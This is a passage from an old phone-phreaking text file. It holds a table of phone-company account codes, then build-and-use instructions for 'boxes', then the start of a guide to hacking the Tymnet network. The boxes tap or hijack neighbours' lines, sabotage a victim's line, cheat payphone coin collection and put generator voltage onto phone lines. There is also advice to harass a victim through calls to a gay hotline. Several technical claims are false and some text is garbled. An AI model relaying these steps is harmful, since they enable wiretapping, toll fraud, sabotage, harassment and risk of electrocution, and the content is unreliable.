  582. 717# │         │ (412)633-5600 │ 8:30-5:00 │  E   │     3    │ 
  583. 717@ │6630109ATZ (717)245-6829 │           │      │    N/A   │ 
  584. 718  │   111   │ (518)471-8111 │ 8:00-5:00 │  E   │    16    │ 
  585. 719  │ I47127  │ (402)572-5858 │ 8:00-5:00 │  M   │     5    │ 
  586. 801  │ I47127  │ (402)572-5858 │ 24 hours  │  C   │     2    │ 
  587. 802  │   411   │ (518)471-8111 │ 8:00-5:00 │  E   │    16    │ 
  588. 803  │ 3402   │ (803)251-0046 │ 8:30-5:00 │  E   │   3-15   │ 
  589. 804  │         │ (304)343-1401 │ 8:00-4:10 │  E   │     3    │ 
  590. 805  │1659/2826│ (415)781-5271 │ 8:30-5:00 │  P   │     5    │ 
  591. 806  │ SW5167  │ (512)828-2501 │ 8:00-5:00 │  C   │     3    │ 
  592. 807  │         │ (416)443-0542 │ 8:30-5:00 │  E   │    N/A   │ 
  593. 808  │         │ (800)852-8840 │ 8:00-6:00 │  E   │    N/A   │ 
  594. 809  │         │ (800)852-8840 │ 8:30-5:00 │  E   │    N/A   │ 
  595. 812  │   161   │ (317)265-4834 │ 8:30-4:45 │  E   │     3    │ 
  596. 813  │ 13402   │ (803)251-0046 │ 8:30-4:30 │  E   │    N/A   │ 
  597. 813  │GTE only │ (813)442-7229 │ 8:00-5:00 │  E   │    N/A   │ 
  598. 814  │         │ (412)633-5600 │ 8:30-5:00 │  E   │     3    │ 
  599. 815  │   700   │ (217)789-8290 │ 8:00-5:00 │  C   │     2    │ 
  600. 816  │ SW1012  │ (816)275-8460 │ 8:00-4:45 │  C   │     3    │ 
  601. 817  │ SW5167  │ (817)461-4769 │ 8:00-5:00 │  C   │     3    │ 
  602. 818  │1659/2826│ (415)781-5271 │ 6:45-5:00 │  P   │     5    │ 
  603. 819  │         │ (514)391-7440 │ 8:00-4:30 │  E   │    N/A   │ 
  604. 901  │ 13402   │ (615)373-7663 │ 8:00-4:10 │  E   │     3    │ 
  605. 902  │         │ (902)421-4110 │ 8:15-4:45 │  A   │    N/A  ││ 
  606. 904  │ 13402   │ (803)251-0046 │ 8:30-5:00 │  E   │   3-15   │ 
  607. 906  │ 61728   │ (313)424-0900 │ 24 hours  │  E   │    20    │ 
  608. 907  │         │     *NONE*    │           │      │    N/A   │ 
  609. 912  │ 13402   │ (803)251-0046 │ 8:30-5:00 │  E   │   3-15   │ 
  610. 913  │ SW2019  │ (913)276-6708 │ 8:00-4:45 │  C   │     3    │ 
  611. 914  │   111   │ (518)471-8111 │ 8:00-5:00 │  E   │    16    │ 
  612. 915  │ SW5167  │ (512)828-2501 │ 8:00-5:00 │  P   │     5    │ 
  613. 916  │1659/2826│ (415)781-5271 │ 8:30-5:00 │  P   │     5    │ 
  614. 918  │ SW4070  │ (405)236-6121 │ 7:30-4:10 │  C   │     3    │ 
  615. 919  │ 13402   │ (803)251-0046 │ 8:30-5:00 │  E   │    3-5   │
  616. ─────┴─────────┴───────────────┴───────────┴──────┴──────────┘
  617.  
  618.  # - Bell of PA
  619.  @ - United
  620.  
  621.  Time Zones: P - Pacific   12:00 pm
  622.              M - Mountain   1:00 pm
  623.              C - Central    2:00 pm
  624.              E - Eastern    3:00 pm
  625.              A - Atlantic    4:00 pm
  626.  
  627.  Note:  The account code for Centel and CONTEL is CNAT, United
  628. Tel. is 6630109ATZ
  629.      Well, that's about it. I tried to find any mistakes that
  630. might have occurred during typing, but there's bound to be one or
  631. two around... Two things to note here: 
  632. 1> California has 2 codes listed (1659 and 2826). The first is
  633. for people in California, the second is for everyone else outside
  634. of California obtaining a CNA in those area codes.
  635.  
  636. 2> Michigan ALSO has two codes. The first was the one currently
  637. working when I last tried; the second is what the new code will
  638. be if it hasn't been changed already... It's a totally automated
  639. system, so try both codes.
  640.  
  641.  
  642.                           Lock In Trace
  643. A lock in trace is a device used by the F.B.I. to lock into the
  644. phone users location so that he can not hang up while a trace is
  645. in progress. For those of you who are not familiar with the
  646. concept of 'locking in', then here's a brief description. The
  647. F.B.I. can tap into a conversation, sort of like a three-way call
  648. connection. Then, when they get there, they can plug electricity
  649. into the phone line. All phone connections are held open by a
  650. certain voltage of electricity. That is why you sometimes get
  651. static and faint connections when you are calling far away,
  652. because the electricity has trouble keeping the ine up. What the
  653. lock in trace does is cut into the line and generate that same
  654. voltage straight into the lines. That way, when you try and hang
  655. up, voltage is retained. Your phone will ring just like someone
  656. was calling you even after you hang up. (If you have call
  657. waiting, you should understand better about that, for call
  658. waiting intercepts the electricity and makes a tone that means
  659. someone is going through your line. Then, it is a matter of which
  660. voltage is higher. When you push down the receiver, then it see-
  661. saws the electricity to the other side. When you have a person on
  662. each line it is impossible to hang up unless one or both of them
  663. will hang up. If you try to hang up, voltage is retained, and
  664. your phone will ring. That should give you an understanding of
  665. how calling works. Also, when electricity passes through a
  666. certain point on your hone, the electricity causes a bell to
  667. ring, or on some newer phones an electronic ring to sound.) So,
  668. in order to eliminate the trace, you somehow must lower the
  669. voltage level on your phone line. You should know that every time
  670. someone else picks up the phone line, then the voltage does
  671. decrease a little. In the first steps of planning this out, Xerox
  672. suggested getting about a hundred phones all hooked into the same
  673. line that could all be taken off the hook at the same time. That
  674. would greatly decrease the voltage level. That is also why most
  675. three-way connections that are using the bell service three way
  676. calling (which is only $3 a month) become quite faint after a
  677. while. By now, you should understand the basic idea. You have to
  678. drain all of the power out of the line so the voltage can not be
  679. kept up. Rather sudden draining of power could quickly short out
  680. the F.B.I. voltage machine, because it was only built to sustain
  681. the exact voltage necessary to keep the voltage out. For now,
  682. imagine this. One of the normal Radio Shack generators that you
  683. can go pick up that one end of the cord that hooks into the
  684. central box has a phone jack on it and the other has an
  685. electrical plug. This way, you can "flash" voltage through the
  686. line, but cannot drain it. So, some modifications have to be
  687. done.
  688.  
  689. Materials
  690. ----------
  691. A BEOC (Basic Electrical Output Socket), like a small lamp-type
  692. connection, where you just have a simple plug and wire that would
  693. plug into a light bulb. One of cords metioned above, if you
  694. can't find one then construct your own... Same voltage
  695. connection, but the restrainer must be built in (I.E. The central
  696. box)
  697. Two phone jacks (one for the modem, one for if you are being
  698. traced to plug the aqua box into)
  699.  
  700. Procedure
  701. ----------
  702.  All right, this is a very simple procedure. If you have the
  703. BEOC, it could drain into anything: a radio, or whatever. The
  704. purpose of having that is you are going to suck the voltage out
  705. from the phone line into the electrical appliance so there would
  706. be no voltage left to lock you in with.
  707.  
  708. Take the connection cord. Examine the plug at the end. It should
  709. have only two prongs. If it has three, still, do not fear. Make
  710. sure the electrical appliance is turned off unless you want to
  711. become a crispy critter while making this thing. Most plugs will
  712. have a hard plastic design on the top of them to prevent you from
  713. getting in at the electrical wires inside. Well, remove it. If
  714. you want to keep the plug (I don't see why...) then just cut the
  715. top off. When you look inside, Lo and Behold, you will see that
  716. at the base of the prongs there are a few wires connecting in.
  717. Those wires conduct the power into the appliance. So, you
  718. carefully unwrap those from the sides and pull them out until
  719. they are about an inch ahead of the prongs. If you don't want to
  720. keep the jack, then just rip the prongs out. If you are, cover
  721. the prongs with insulation tape so they will not connect with the
  722. wires when the power is being drained from the line. Do the same
  723. thing with the prongs on the other plug, so you have the wires
  724. evenly connectd. Now, wrap the end of the wires around each
  725. other. If you happen to have the other end of the voltage cord
  726. hooked into the phone, stop reading now, you're too stupid to
  727. continue. After you've wrapped the wires around each other, then
  728. cover the whole thing with the plugs with insulating tape. Then,
  729. if you built your own control box or if you bought one, then cram
  730. all the wires into it and close it. That box is your ticket out
  731. of this. Re-check everything to make sure it's all in place. This
  732. is a pretty flimsy connection, but on later models when you get
  733. more experienced at it then you can solder away at it and form
  734. the whole device into one big box, with some kind of cheap Mattel
  735. hand-held game inside to be the power connector. In order to use
  736. it, just keep this box handy. Plug it into the jack if you want,
  737. but it will slightly lower the voltage so it isn't connected.
  738. When you plug it in, if you see sparks, unplug it and restart the
  739. whole thing. But if it just seems fine then leave it.
  740.  
  741. Now, so you have the whole thing plugged in and all... Do not use
  742. this unless the situation is desperate! When the trace has gone
  743. on, don't panic, unplug your phone, and turn on the appliance
  744. that it was hooked to. It will need energy to turn itself on, and
  745. here's a great source... The voltage to keep a phone line open is
  746. pretty small and a simple light bulb should drain it all in and
  747. probably short the F.B.I. computer at the same time. Happy boxing
  748. and stay free!
  749.  
  750.                            Pinkish Box
  751.   The function of a "Pink Box" is a hold button that allows music
  752. or anything else to be played into the telephone while person is
  753. on hold. This modification either be done right in the telephone
  754. as a separate box.
  755.  
  756. Materials Needed
  757.  
  758. 1. Some Bell wire or Phone wire
  759. 2. A SPST momentary switch       RS # 275-1547
  760. 3. 470 ohm resistor              RS # 271-019
  761. 4. 1 LED (Approx 5V)             RS # 276-041
  762. 5. An SCR, 2N5061  (Transistor)
  763. 6. Audio Transformer (Ratio 10K:600)
  764. 7. RCA phono Jack                RS # 274-346
  765. 8. Screw drivers, soldering irons, solder, Etc.
  766.  
  767. 1. Open the wall box and locate the RED and GREEN wires.
  768. 2. Take a piece or RED wire and strip tend and attach it to the
  769. red lead on the wall box.  Do the same for the GREEN.
  770. 3. Connect the GREEN wire to the ANODE of the LED.
  771. 4. Connect the CATHODE side of the LED the UPPER pin of the
  772. primary side of the transformer.
  773. 5. Connect the pin directly across to one pole of the phono jack.
  774. 6. Connect the RED wire to one side of  resistor and to the "C
  775. pole" of the transistor.
  776. 7. Connect the open pin of the switch the other side of the
  777. resistor and to the "G pole"  of the transistor. Wiring Diagram
  778.  
  779.           RCA Jack    X-former    LED
  780.                       _____      C   A
  781.   Pole or Jack --/---! Top !---/--(*)--\------GREEN wire
  782.                     -!View !- Primary   --I---RED wire
  783.   Pole of Jack --/---!_____!---/-I       (O)
  784.                                  I        I
  785.                                  I     [--I-----Pole of Switch    
  786.                              I                                 
  787. I--------/--m--Pole of Switch
  788.  
  789.  
  790. Key to Symbols
  791.  
  792. --  Wire
  793. I   Connection or wire
  794. /   Connection or wire
  795.  
  796.  
  797.  _/    C pole of transistor    --(*)--
  798. [_)--  G pole of transistor    I
  799.  I     A pole of transistor   (O)  Resister
  800.                                I
  801.      _____
  802.  ---! Top !---
  803.    -! View!- Primary    Transformer
  804.  ---!_____!---
  805.  
  806.     Hook the RED and GREEN wires up to the appropriate terminals
  807. and hook the RCA jack to the output on your stereo.  Turn on your
  808. stereo at a good volume. Now call a friend.  To test the Box,
  809. hold down the switch and hang up the phone.  The LED should go
  810. and your friend should hear music, If not then start over.  The
  811. hold is shut off if you pick up a phone on that line or your end
  812. hangs up.
  813.  
  814.                             Pearl Box
  815. The Pearl Box:Definition - This is a box that may substitute for
  816. many boxes which produce tones in hertz. The Pearl Box when
  817. operated correctly can produce tones from 1-999hz. As you can
  818. see, 2600, 1633, 1336 and other crucial tones are obviously in
  819. its sound spectrum.
  820.  
  821. Materials you will need in order to
  822. build The Pearl Box:
  823. =====================================
  824. C1, C2:.5mf or .5uf ceramic disk
  825.        capacitors
  826. Q1.....NPN transistor (2N2222 works
  827.        best)
  828. S1.....Normally open momentary SPST
  829.        switch
  830. S2.....SPST toggle switch
  831. B1.....Standard 9-Volt battery
  832. R1.....Single turn, 50k potentiometer
  833. R2.....  "     "    100k potentiometer
  834. R3.....  "     "    500k potentiometer
  835. R4.....  "     "    1meg potentiometer
  836. SPKR...Standard 8-ohm speaker
  837. T1.....Mini transformer (8-ohm works
  838.          best)
  839. Misc...Wire, solder, soldering iron, PC
  840.          board or perfboard, box to
  841.          contain the completed unit,
  842.          battery clip
  843.  
  844. Instructions for building Pearl Box:
  845. ======================================
  846.  
  847. Since the instruction are EXTREMELY difficult to explain in
  848. words, you will be given a schematic instead. It will be quite
  849. difficult to follow but try it any way. There is also a Hi-Res
  850. picture you can get that shows the schematic in great detail.
  851.  
  852. Schematic for The Pearl Box
  853.  
  854. +---+------------+---------+
  855.     !             !          \
  856.     C1            C2          \
  857.     !             !            +
  858.     +             +       -----+T1
  859.     !\            +------------+-+
  860.     !  b  c-------!              +
  861.     !   Q1                   !   +-S1-
  862.     !     e-----S2---+       !    SPKR
  863.     !                !       !   +----
  864.     !               B1       !
  865.     !                !       !
  866.     !                +-------+
  867.     !R1   R2   R3   R4!
  868.     /\/\ /\/\ /\/\ /\/\
  869.       +--+ +--+ +--+
  870.  
  871. Now that you are probably thoroughly confused, let me explain a
  872. few minor details. The potentiometer area is rigged so that the
  873. left pole is connected to the center pole of the potentiometer
  874. next to it. The middle terminal of T1 is connected to the piece
  875. of wire that runs down to the end of the battery.
  876.  
  877. Correct operation of The Pearl Box:
  878. You may want to get some dry-transfer decals at Radio Shack to
  879. make this job a lot easier. Also, some knobs for the tops of the
  880. potentiometers may be useful too. Use the decals to calibrate the
  881. knobs. R1 is the knob for the ones place, R2 is for the tens
  882. place, R3 if for the hundreds place and R4 is for the thousands
  883. place. S1 is for producing the all the tones and S2 is for power.
  884.  
  885. Step 1: Turn on the power and adjust the knobs for the desired
  886. tone.        (Example: For 2600 hz-
  887.          R1=0:R2=0:R3=6:R4=2)
  888.  
  889. Step 2: Hit the pushbutton switch and VIOLA! You have the tone.
  890. If you don't have a tone recheck all connections and schematic.
  891. If you still don't have a tone call Brainstorm BBS: 612-345-2815,
  892. The Bay:415-775-2384 or Pirate's Harbor:617-720-3600 and leave me
  893. e-mail stating what the scene is.
  894.  
  895.  
  896.                             Brown Box
  897.  This is a fairly simple modification that can be made to any
  898. phone. All it does is allow you to take any 2 lines in your house
  899. and create a party line. So far I have not heard of any problems
  900. with it from my friends that have set one up and I have not had
  901. any either. There is one thing that you will notice when you are
  902. one of the two people who is called by a person with this box.
  903. The other person will sound a little bit faint. I could overcome
  904. this with some amplifiers but then there wouldn't be very many of
  905. these boxes made. I think that the convenience of having two
  906. people on line at any one time will make up for the minor volume
  907. loss.
  908. Here is the diagram:
  909. ___________________________
  910. PART                 SYMBOL 
  911. ---------------------------
  912. BLACK WIRE              *
  913. YELLOW WIRE             =
  914. RED WIRE                +
  915. GREEN WIRE              -
  916. SPDT SWITCH            _/_
  917. VERTICAL WIRE           |
  918. HORIZONTAL WIRE         _
  919.  
  920.        *    =    -    +
  921.        *    =    -    +
  922.        *    =    -    +
  923.        *    =    -    +
  924.        *    =    -    +
  925.        *    ==_/_-    +
  926.        *******_/_++++++
  927.        |              |
  928.        |              |
  929.        |              |
  930.        |_____PHONE____|
  931.  
  932. In some houses the black and yellow are already wired in others
  933. you will have to go out to your box and rewire it. A goo way to
  934. figure out which line is which is to take the phone you are
  935. looking for off the hook. Then you only need to take the red and
  936. green wires entering your phone and hook them to the different
  937. pairs of red and green going into the house. You can't hurt
  938. anything in the phone or telephone by probing. When you find the
  939. pair that you want take the black from your line and attach it to
  940. the red of the other line then take the yellow and attach it to
  941. the green line. Now you are all set to go. For people with rotary
  942. phones you can have one person call you then place the second
  943. call out to the other person. Though not a phreaker's tool, the
  944. brown box can be fun.
  945.  
  946.                            Scarlet box
  947.    The purpose of a Scarlet box is to create a very bad
  948. connection, it can be used to crash a BBS or just make life
  949. miserable for those you seek to avenge.
  950.  
  951.    Materials: 2 alligator clips, 3 inch wire, or a resister
  952. (plain wire will create greatest amount of static)
  953. (Resister will decrease the amount of static in proportion to the
  954. resister you are using)
  955. Step (1): Find the phone box at your victims house, and pop the
  956. cover off. Step (2): Find the two prongs that the phone line you
  957. wish to box are connected to.
  958. Step (3): Hook your alligator clips to your (wire/resister). Step
  959. (4): Find the lower middle prong and take off all wires connected
  960. to it, I think this disables the ground and call waiting and
  961. stuff like that. Step (5): Now take one of the alligator clips
  962. and attach it to the upper most prong, and take the other and
  963. attach it to the lower middle prong. Step (6): Now put the cover
  964. back on the box and take off!!
  965.  
  966.                            Day-Glow
  967.   A day-glow box is very easy to make, and very inexpensive to
  968. build. It works like this: On the outside of every home that has
  969. a phone, there is something called "the outside connection box,"
  970. which is where the house is connected to Ma Bell's network. This
  971. ingenious device connects to a) your phone, b) the victim's
  972. outside box. You should be starting to get the idea.
  973.  
  974. Materials necessary:
  975. 1. Radio Shack modular conversion jack
  976. 2. A small experimenter's box (optional)
  977. 3. 1 foot of red wire. (better to overkill)
  978. 4. 1 foot of green wire. (same as above)
  979. 5. 2 medium alligator clips
  980.  
  981. In order to construct this box, you will need all of the above
  982. materials. Note that your wire does not necessarily have to be
  983. red or green, but it is necessary that you be able to tell them
  984. apart. Also, you might want to use thick, easily bent wire (audio
  985. hookup wire works best) instead of bell wire. Now, on to the
  986. construction.
  987.  
  988. Remove the actual modular jack from the conversion box. This can
  989. be done by pushing inward and then up, or you can just cut the
  990. plastic. Remove the black and yellow wires from the jack. You can
  991. either clip these or rip them out. To your newly isolated jack,
  992. add the 1 foot wire extensions to the respective wires. Soldering
  993. and then wrapping the connections with electrical tape works
  994. best. Next, solder the alligator clips to the extended wires. If
  995. you do not wish to solder them, then just wrap the clips with the
  996. wire. Now, place this newly made contraption into a box
  997. (optional). You may need to drill a few holes, and possibly
  998. remove the alligator clips, but you should have read this file
  999. first, anyway.
  1000.  
  1001.   The day-glow box will work with any phone. First, you need to
  1002. locate a house that has a phone. Next, (it's preferable to do
  1003. this at night) go up to the and locate the outside connection
  1004. box. Pop the cover off. Locate prong 3 and prong 4. You will
  1005. attach the green wire clip to prong 3. The red wire clip will go
  1006. to prong 4. Now, plug your phone (preferably a trimline or
  1007. ranger) into your modular plug. You may now either listen in on
  1008. the call (wire tap) OR you may call out to anywhere in the world.
  1009. If you are really daring, you can bring your computer with you.
  1010. Note: This box may also be used in conjunction with the lunch box
  1011. in order to make a perfect phone bug.
  1012.  
  1013. Neat things you can do with your new box:
  1014. Call 976 numbers. This should be done very frequently. Also, I
  1015. find that after finding the victim's outside box, several calls
  1016. to the gay hotline will have interesting after-effects. Namely,
  1017. his parents wondering about him. Alliance teleconferencing can be
  1018. accomplished quite easily. Try it! Call 0-700-456-1000. Or, tell
  1019. the operator you'd like to initiate a conference. Of course, you
  1020. should place several calls to other countries. This can be
  1021. accomplished by looking in the front of your white pages for the
  1022. various country and city codes. You should be able to follow the
  1023. directions provided in there.
  1024.  
  1025.   Have you ever wondered what those 6ft tall cabinets with the
  1026. bell logo on them were for? Well, if you've never seen them,
  1027. here's a quick description: They are 6ft tall by 3ft wide, and
  1028. painted the dull phone company green. They can be opened quite
  1029. easily with a 7/16ths inch socket wrench. After turning the bold
  1030. over the handle, turn the handle to the right and pull. It should
  1031. open, displaying over 100 different lines. Occasionally, you can
  1032. find tech. manuals and test kits inside. They are usually located
  1033. near phone lines. Okay, now, once you have opened one of these
  1034. calling cabinets, locate the line of your choice. You will have
  1035. to take out both the orange and the white insulated screws. The
  1036. purple and white wires should come off along with the screws. The
  1037. lines go out to the house, and the screw posts are the actual
  1038. line. Now, you should clip the alligators to the posts, with one
  1039. part of the clip on the insulation, and on.]Now, you should clip
  1040. the alligators to the nep parteli. Oh, if you want the home to
  1041. remain connected, clip the wires inside the hole using the
  1042. alligator clips. By the way, the red terminal on your box goes to
  1043. the orange post, and the green one to the white post... if that
  1044. doesn't work, reverse the connection. Now, to find out the number
  1045. you have taken over, dial 380-55555555. Yes, that's eight fives.
  1046. A computer voice should tell you what number you are on. I hope
  1047. you can take it from here. Oh, in apartments, you can find the
  1048. calling cabinet in the basement... remember, this is not your
  1049. line, so do anything you want. Call the President or something.
  1050.  
  1051.                          Gold Box Plans
  1052. Materials:
  1053.  
  1054. 2 10k OHM resistors
  1055. 3 1.4k OHM resistors
  1056. 2 2N3904 transistors
  1057. 2 Photocells
  1058. 2 LED's (Make sure they're real bright)
  1059. 1 Box to contain it in that will not allow sunlight in it.
  1060. (some) wire. Red and green for easiness sake
  1061.  
  1062. Light from the LED's must shine directly on the photocells. You
  1063. may have to have the LED touching the photocell for it to work.
  1064.  
  1065. [The 1.4k resistor is variable and if the second part of the box
  1066. is skipped the box will still work but if someone picks up the
  1067. phone they may report it to the Phone Co. The 1.4k will give you
  1068. good reception with little risk of the Gestapo knocking at your
  1069. door. Take two green wires and strip the ends. Twist one end of
  1070. each together so they make one wire. Connect it to Green #1.
  1071. Label this 'Line #1'. Do the same but with red wire and attach it
  1072. to Red #1. Repeat the process for Red #2 and Green #2 and label
  1073. it 'Line #2'. Find two phone lines that are close together. Label
  1074. one of them 'Line #1'. Cut [the phone lines and take off the
  1075. outer covering. You'l see 4 colored wires inside. Cut the yellow
  1076. and black wire off and strip the red and green wires on both
  1077. lines. Line #1 should be in two pieces. Take the green wire of
  1078. one end and connect to one of the green wires on the box. Take
  1079. the other half of the phone line green wire and connect it to the
  1080. other green wires on the gold box. Do the same for the red wires
  1081. on the other line and the red wires on the box. Now, find out
  1082. what number you hooked up the gold box to. Go home and call it.
  1083. You should get a dial tone and you can dial out. If not, re-check
  1084. everything. If it still doesn't work, pack up and go home.                             Green Box
  1085.  Paying the initial rate in order to use a red box (on certain
  1086. fortresses) left a sour taste in many red boxers mouths, thus the
  1087. green box was invented. The green box generates useful tones such
  1088. as COIN COLLECT, COIN RETURN, AND RINGBACK. These are the tones
  1089. that ACTS or the TSPS operator would send to the CO when
  1090. appropriate. Unfortunately, the green box cannot be used at the
  1091. fortress station but must be used by the CALLED party. Here are
  1092. the tones:
  1093.  
  1094. COIN COLLECT     700+1100hz
  1095. COIN RETURN      1100+1700hz
  1096. RINGBACK         700+1700hz
  1097.  
  1098. Before the called party sends any of these tones, an operator
  1099. release signal should be sent to alert the M detectors at the CO.
  1100. This can be done by sending 900hz + 1500hz or a single 2600 wink
  1101. (90 ms.)
  1102.  
  1103. Also, do not forget that the initial rate is collected shortly
  1104. before the 3 minute period is up.
  1105.  
  1106. Incidentally, once the above M tones for collecting and returning
  1107. coins reach the CO, they are convertedinto an appropriate DC
  1108. pulse (-130 volts for return and +130 for collect). This pulse is
  1109. then sent down the tip to the fortress. This causes the coin
  1110. relay to either return or collect the coins. The alleged "T-
  1111. network" takes advantage of this information. When a pulse for
  1112. coin collect (+130 VDC) is sent down the line, it must be
  1113. grounded somewhere. This is usually the yellow or black wire.
  1114. Thus, if the wires are exposed, these wires can be cut to prevent
  1115. the pulse from being grounded. When the three minute initial
  1116. period is almost up, make sure that the black and yellow wires
  1117. are severed, then hang up, wait about 15 seconds in case of a
  1118. second pulse, reconnect the wires, pick up the phone, an if all
  1119. goes well, it should be "JACKPOT" time.
  1120.  
  1121.                            Blotto Box
  1122.   For years now every pirate has dreamed of the Blotto Box. It
  1123. was at first made as a joke to mock more ignorant people into
  1124. thinking that the function of it actually was possible. Well, if
  1125. you are The Voltage Master, it is possible. Originally conceived
  1126. by King Blotto of much fame, the Blotto Box is finally available
  1127. to the public.
  1128.   The Blotto Box is every phreak's dream... you could hold AT&T
  1129. down on its knee's with this device. Be
  1130. cause, quite simply, it can turn off the phone lines everywhere.
  1131. Nothing. Blotto. No calls will be allowed out of an area code,
  1132. and no calls will be allowed in. No calls can be made inside it
  1133. for that matter. As long as the switching system stays the same,
  1134. this box will not stop at a mere area code. It will stop at
  1135. nothing. The electrical impulses that emit from this box will
  1136. open every line. Every line will ring and ring and ring... the
  1137. voltage will never be cut off until the box/generator is stopped.
  1138. This is no 200 volt job, here. We are talking GENERATOR. Every
  1139. phone line will continue to ring, and people close to the box may
  1140. be electrocuted if they pick up the phone.
  1141.   But, the Blotto Box can be stopped by merely cutting of the
  1142. line or generator. If they are cut off then nothing will emit any
  1143. longer. It will take a while for the box to calm back down again,
  1144. but that is merely a superficial aftereffect. Once again:
  1145. Construction and use of this box is not advised! The Blotto Box
  1146. will continue as long as there is electricity to continue with.
  1147.   OK, that is what it does, now, here are some interesting things
  1148. for you to do with it...
  1149.  
  1150.   Once you have installed your Blotto, there is no turning back.
  1151. The following are the instructions for construction and use of
  1152. this box. Please read and heed all warnings in the above section
  1153. before you attempt to construct this box.
  1154.  
  1155.   Materials:
  1156. - A Honda portable generator or a main power outlet like in a
  1157. stadium or some such place.
  1158. - A radm r=L L5I Z] ] for 400 volts that splices a female plug
  1159. into a phone line jack.
  1160. - A meter of voltage to attach to the box itself.
  1161. - A green base (i.e. one of the nice boxes about 3' by 4' that
  1162. you see around in your neighborhood. They are the main switch
  1163. boards and would be a more effective line to start with.
  1164. or:  regular phone jack (not your own, and not in your area
  1165. code! - A soldering iron and much solder.
  1166. - A remote control or long wooden pole.
  1167.  
  1168.  Now. You must have guessed the construction from that. If not,
  1169. here goes, I will explain in detail. Take the Honda Portable
  1170. Generator and all of the other listed equipment and go out and
  1171. hunt for a green base. Make sure it is one on the ground or
  1172. hanging at head level from a pole, not the huge ones at the top
  1173. of telephone poles. Open it up with anything convenient, if you
  1174. are two feeble then don't try this. Take a look inside... you are
  1175. hunting for color-coordinating lines of green and red. Now, take
  1176. out your radio shack cord and rip the meter thing off. Replace it
  1177. with the voltage meter about. A good level to set the voltage to
  1178. is about 1000 volts. Now, attach the voltage meter to the cord
  1179. and set the limit for one thousand. Plug the other end of the
  1180. cord into the generator. Take the phone jack and splice the jack
  1181. part off. Open it up and match the red and green wires with the
  1182. other red and green wires. NOTE: If you just had the generator on
  1183. and have done this in the correct order, you will be a crispy
  1184. critter. Keep the generator off until you plan to start it up.
  1185. Now, solder those lines together carefully. Wrap duck tape or
  1186. insulation tape around all of the wires. Now, place the remote
  1187. control right on to the startup of the generator. If you have the
  1188. long pole, make sure it is very long and stand back as far away
  1189. as you can get and reach the pole over. NOTICE: If you are going
  1190. right along with this without reading the file first, you should
  1191. realize now that your area code is about to become null! Then,
  1192. getting back, twitch the pole/remote control and run for your
  1193. damn life. Anywhere, just get away from it. It will be generating
  1194. so much electricity that if you stand to close you will kill
  1195. yourself. The generator will smoke, etc. but will not stop. You
  1196. are now killing your area code, because all of that energy is
  1197. spreading through all of the phone lines around you in every
  1198. direction.
  1199.                         Computer Hacking
  1200.                              TYMNET
  1201.  
  1202. Introduction:
  1203.  
  1204. Many people may or may not have heard of Tymnet. Tymnet is one of
  1205. the best information gathering networks that is around. It seems
  1206. as though it were set up with the hacker in mind, but we all know
  1207. this isn't true. After becoming experienced with the network, I
  1208. found there to be little information available to the newcomer,
  1209. with the exception of what is already available on the network,
  1210. but as we all know, this leaves the newcomer craving for more. As
  1211. this file was under construction, a great blow hit the hacker
  1212. community on the network; four of the most popular NUIs died
  1213. (NUIs to be discussed later). They were VIDEO, and the T.LLOYxx
  1214. Family. In hopes of having the community reborn, an additional
  1215. new NUI has been included.
  1216.  
  1217. For more information regarding Tymnet, Telenet, and other PSNs,
  1218. consult the Leigon's of Lucifer Text File #10-11. Although other
  1219. information on PSNs is available from Leigon's of Lucifer, this
  1220. file was written in mind that the reader is unfamiliar with
  1221. Tymnet. Terminology that would appear to be new to the reader is
  1222. explained, in hopes that you will gain a greater knowledge of the
  1223. networks.
  1224.  
  1225. Tymnet is an international network designed for two basic
  1226. reasons. One, to link computers worldwide in order to exchange
  1227. information. Two, so hackers can take advantage of the network
  1228. and connect to the as many computers available =).
  1229.  
  1230. Tymnet is linked to computers throughout the world including most
  1231. major continents (North/South America, Asia, Europe, Africa,
  1232. Australia, etc.). Tymnet is referred to as a PSN, which is an
  1233. acronym for Packet Switching Network. A PSN is any network that
  1234. sends information via packets, in Tymnet's case, 128 byte
  1235. packets.
  1236.  
  1237.         The following is an example of a simple PSN, which
  1238. includes three major components:
  1239.  
  1240.         1) The PAD      (Your Local Dialup)
  1241.         2) The PSN      (The network that you are currently on)   
  1242.         3) The Host     (The computer you connect to via the PSN)
  1243.  
  1244. Use of a PSN is quite simple. First you must connect to your
  1245. local PAD, and sign in with a NUI. If the NUI is valid, a colon
  1246. prompt will follow (;), at which you may enter any NUA (NUAs to
  1247. be discussed later), depending on what level of access the NUI
  1248. has. The PSN then connects you to the Host, posing as a relay
  1249. between you and the host. If this appears confusing, read through
  1250. the rest of this file, and browse back through it, and possibly
  1251. you will understand the concept a bit better.
  1252.  
  1253. Since Tymnet is not connected to nearly as many businesses as
  1254. Telenet, it turns to be more of a communication and information
  1255. gathering tool then a scanning one. Hackers on Tymnet, which can
  1256. be contacted on the many various chat systems are almost always
  1257. bound to have information to trade, or give away. Almost
  1258. everything is available, from telco, fraud, to hacking.
  1259.  
  1260. Connecting to Tymnet:
  1261.  
  1262. The first thing you must do is find your local Tymnet dialup. If
  1263. you already know your dialup, you can skip by this paragraph, and
  1264. move on. There are two ways to acquire your dialup. Voice, or
  1265. data. If you choose to find out your dialup voice, call 1-
  1266. (800)-222-0555. Use your touch-tone keypad and follow the voice
  1267. prompts. Data is quite simple if you are already familiar with
  1268. the logon process on Tymnet. Type 'Information', or 'Info' at the
  1269. NUI (Logon) prompt. It's self explanatory from there. You can
  1270. also dial 1-(800) 336-0149 to find out your local dial, this
  1271. includes HST Modems.
  1272.  
  1273. You must now prepare your terminal to communicate with Tymnet.
  1274. Switch your parity to either 7E1 or 8N1. 7E1 is preferred, as I
  1275. have encountered problems using 8N1. Toggle your Local Echo until
  1276. it appears satisfactory. Once connected, Hit return a few times
  1277. until the following message appears:
  1278.  
  1279. please type your terminal identifier
  1280.  
  1281. When this occurs, hit 'a' if you have 7E1, or 'o' if you have 8N1
  1282. set up. The 'a' / 'o' combination tells the PAD your parity
  1283. setting. Something to this effect will follow:
  1284.  
  1285.     -4353:01-007-
  1286.     please log in:
  1287.  
  1288. You have now successfully connected to Tymnet.
  1289.  
  1290. Usage of NUIs:
  1291.  
  1292. NUI is an acronym for Network User Identification. This is much
  1293. like the standard 'user name' on your favorite BBS. NUIs are
  1294. legitimate accounts given to paying members of Tymnet. Hackers
  1295. always seem to have a knack for setting up illegal NUIs though.
  1296. Unlike Telenet, Tymnet NUIs are easy to find. The NUI 'VIDEO',
  1297. which was by far one of the most popular hacker NUIs on Tymnet
  1298. was cancelled during the construction of this file. Along with
  1299. it, the T.LLOYxx Family died (T.LLOY01, T.LLOY02, T.LLOY03).
